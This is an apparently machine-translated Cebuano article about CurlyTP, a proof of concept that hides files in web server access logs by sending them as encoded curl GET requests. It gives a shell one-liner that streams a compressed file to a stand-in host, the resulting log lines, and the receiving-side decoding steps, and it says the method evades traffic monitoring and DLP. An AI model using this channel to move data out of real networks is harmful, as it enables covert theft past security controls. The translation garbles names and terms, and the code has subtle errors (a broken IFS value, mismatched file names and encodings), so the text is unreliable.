Sumala sa kahulugan sa Wikipedia, ang usa ka patay nga pagtulo usa ka himan sa panagkunsabo nga nagsilbi nga pagbayloay og impormasyon o pipila ka mga butang tali sa mga tawo nga naggamit sa usa ka sekreto nga lokasyon. Ang ideya mao nga ang mga tawo dili magkita - apan nagbinayloay gihapon sila og kasayuran aron mapadayon ang kaluwasan sa operasyon.

Ang tagoanan kinahanglan dili makadani sa atensyon. Busa, sa offline nga kalibutan kanunay nilang gigamit ang mga butang nga maalamon: usa ka luag nga tisa sa dingding, usa ka libro sa librarya, o usa ka lungag sa usa ka kahoy.

Adunay daghang mga himan sa pag-encrypt ug anonymization sa Internet, apan ang kamatuoran sa paggamit niini nga mga himan nakadani sa atensyon. Dugang pa, mahimo silang gibabagan sa lebel sa korporasyon o gobyerno. Unsay buhaton?

Gisugyot sa developer nga si Ryan Flowers ang usa ka makapaikag nga kapilian - gamita ang bisan unsang web server isip tagoanan. Kung hunahunaon nimo kini, unsa ang mahimo sa usa ka web server? Nakadawat mga hangyo, nag-isyu sa mga file ug nagsulat og mga troso. Ug kini nag-log sa tanan nga mga hangyo, bisan sa mga sayop!

Kini nahimo nga ang bisan unsang web server nagtugot kanimo sa pagluwas sa halos bisan unsang mensahe sa log. Naghunahuna ang mga bulak kung giunsa kini gamiton.

Gitanyag niya kini nga kapilian:

1. Pagkuha ug text file (sekreto nga mensahe) ug kuwentaha ang hash (md5sum).
2. Among gi-encode kini (gzip+uuencode).
3. Nagsulat kami sa log gamit ang usa ka tinuyo nga sayup nga hangyo sa server.

Local:
[root@local ~]# md5sum g.txt
a8be1b6b67615307e6af8529c2f356c4 g.txt

[root@local ~]# gzip g.txt
[root@local ~]# uuencode g.txt > g.txt.uue
[root@local ~]# IFS=$'n' ;for x in `cat g.txt.uue| sed 's/ /=+=/g'` ; do echo curl -s "http://domain.com?transfer?g.txt.uue?$x" ;done | sh

Aron mabasa ang usa ka file, kinahanglan nimo nga buhaton kini nga mga operasyon sa reverse order: decode ug unzip ang file, susiha ang hash (ang hash mahimong luwas nga mapasa sa bukas nga mga channel).

Ang mga luna gipulihan sa =+=aron walay mga luna sa adres. Ang programa, nga gitawag sa tagsulat nga CurlyTP, naggamit sa base64 encoding, sama sa email attachment. Ang hangyo gihimo gamit ang usa ka keyword ?transfer?aron ang nakadawat dali nga makit-an sa mga troso.

Unsa ang atong makita sa mga troso niini nga kaso?

1.2.3.4 - - [22/Aug/2019:21:12:00 -0400] "GET /?transfer?g.gz.uue?begin-base64=+=644=+=g.gz.uue HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:01 -0400] "GET /?transfer?g.gz.uue?H4sICLxRC1sAA2dpYnNvbi50eHQA7Z1dU9s4FIbv8yt0w+wNpISEdstdgOne HTTP/1.1" 200 4050 "-" "curl/7.29.0"
1.2.3.4 - - [22/Aug/2019:21:12:03 -0400] "GET /?transfer?g.gz.uue?sDvdDW0vmWNZiQWy5JXkZMyv32MnAVNgQZCOnfhkhhkY61vv8+rDijgFfpNn HTTP/1.1" 200 4050 "-" "curl/7.29.0"

Sama sa nahisgutan na, aron makadawat usa ka sekreto nga mensahe kinahanglan nimo nga himuon ang mga operasyon sa reverse order:

Remote machine

[root@server /home/domain/logs]# grep transfer access_log | grep 21:12| awk '{ print $7 }' | cut -d? -f4 | sed 's/=+=/ /g' > g.txt.gz.uue
[root@server /home/domain/logs]# uudecode g.txt.gz.uue

[root@server /home/domain/logs]# mv g.txt.gz.uue g.txt.gz
[root@server /home/domain/logs]# gunzip g.txt.gz
[root@server /home/domain/logs]# md5sum g
a8be1b6b67615307e6af8529c2f356c4 g

Ang proseso dali nga ma-automate. Ang Md5sum motakdo, ug ang mga sulod sa file nagpamatuod nga ang tanan na-decode sa husto.

Ang pamaagi yano ra kaayo. "Ang punto niini nga ehersisyo mao lang ang pagpamatuod nga ang mga file mahimong mabalhin pinaagi sa inosente nga gagmay nga mga hangyo sa web, ug kini molihok sa bisan unsang web server nga adunay yano nga mga log sa teksto. Sa esensya, ang matag web server usa ka tagoanan!” misulat si Flowers.

Siyempre, ang pamaagi magamit lamang kung ang nakadawat adunay access sa mga log sa server. Apan ang ingon nga pag-access gihatag, pananglitan, sa daghang mga host.

Unsaon paggamit niini?

Si Ryan Flowers nag-ingon nga dili siya usa ka eksperto sa seguridad sa impormasyon ug dili mag-compile og lista sa posibleng mga gamit para sa CurlyTP. Para niya, usa lang kini ka pruweba sa konsepto nga ang pamilyar nga mga himan nga atong makita matag adlaw mahimong magamit sa dili kinaandan nga paagi.

Sa tinuud, kini nga pamaagi adunay daghang mga bentaha sa ubang mga server nga "nagtago" sama Digital Patay nga Drop o PirateBox: wala kini magkinahanglan og espesyal nga pag-configure sa kilid sa server o bisan unsang espesyal nga mga protocol - ug dili makapukaw sa pagduda sa mga nag-monitor sa trapiko. Dili tingali nga ang SORM o DLP nga sistema mag-scan sa mga URL alang sa mga compressed text files.

Usa kini sa mga paagi sa pagpasa sa mga mensahe pinaagi sa mga file sa serbisyo. Mahinumduman nimo kung giunsa ang pagbutang sa pipila ka mga advanced nga kompanya Mga Trabaho sa Developer sa HTTP Header o sa code sa HTML nga mga panid.

Ang ideya mao nga ang mga web developer lang ang makakita niining itlog sa Pasko sa Pagkabanhaw, tungod kay ang usa ka normal nga tawo dili motan-aw sa mga ulohan o HTML code.

Source: www.habr.com